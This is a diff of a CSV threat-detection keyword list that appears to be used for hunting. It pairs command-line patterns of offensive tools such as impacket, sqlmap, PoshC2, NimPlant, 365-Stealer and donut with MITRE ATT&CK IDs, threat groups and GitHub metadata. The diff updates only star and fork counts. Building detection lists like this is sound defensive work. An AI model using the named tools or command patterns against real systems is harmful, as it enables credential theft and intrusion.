 "* --custom-steal onedrive*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
 "* --custom-steal onenote*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
 "* --custom-steal outlook*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
-"* --cve=* --command*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z"
+"* --cve=* --command*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z"
 "* CVE-2023-38831-RaRCE*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
 "* cvs-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* cvs-brute-repository.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -405,37 +405,37 @@ "* -d * -u * -p * --listener * --target *$DC_HOST*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* -d * -u *\* -p * --da*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* -d *Active Protection DLL for SylantStrike*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" -"* -d:sleepmask*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* -d:sleepmask*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "* daap-get-library.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -daisyserver *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* darkcodersc *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"* -daisyserver *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"* darkcodersc *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z"
 "* darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z"
 "* daytime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* db2-das-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
-"* --dbms=mysql -u *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" 
-"* --dc * -m custom --filter *objectCategory*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"* --dbms=mysql -u *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" 
+"* --dc * -m custom --filter *objectCategory*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "* -dc-host * -spn * -impersonate *","offensive_tool_keyword","Pachine","Python 
implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" 
-"* -dc-ip * -so *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" 
-"* -dc-ip * -computer-pass *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" 
-"* -dc-ip * -dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
-"* -dc-ip * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" 
-"* --dc-ip * -request * -format hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" 
-"* -dc-ip * -target-ip *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" 
-"* --dc-ip * --vuln --enabled*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
-"* -dc-ip *SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"* -dc-ip * -so *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" 
+"* -dc-ip * -computer-pass *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" 
+"* -dc-ip * -dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"* -dc-ip * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" 
+"* --dc-ip * -request * -format hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" 
+"* -dc-ip * -target-ip *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" 
+"* --dc-ip * --vuln --enabled*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"* -dc-ip *SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "* dcow.c *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z"
 "* dcow.cpp*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" 
-"* -DDONUT_EXE *","offensive_tool_keyword","donut","Donut is a position-independent code that enables 
in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" 
+"* -DDONUT_EXE *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
 "* --deauth * -a TR:GT:AP:BS:SS:ID wlan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
-"* decrypt *.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" 
+"* decrypt *.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "* deepce.sh *--install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
-"* default_logins.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" 
+"* default_logins.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
 "* Defense_Evasion.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z"
 "* DelegationBOF.c *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
 "* delegationx64.o*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 
- Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
 "* delegationx86.o*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
 "* deluge-rpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
-"* demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" 
+"* demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z"
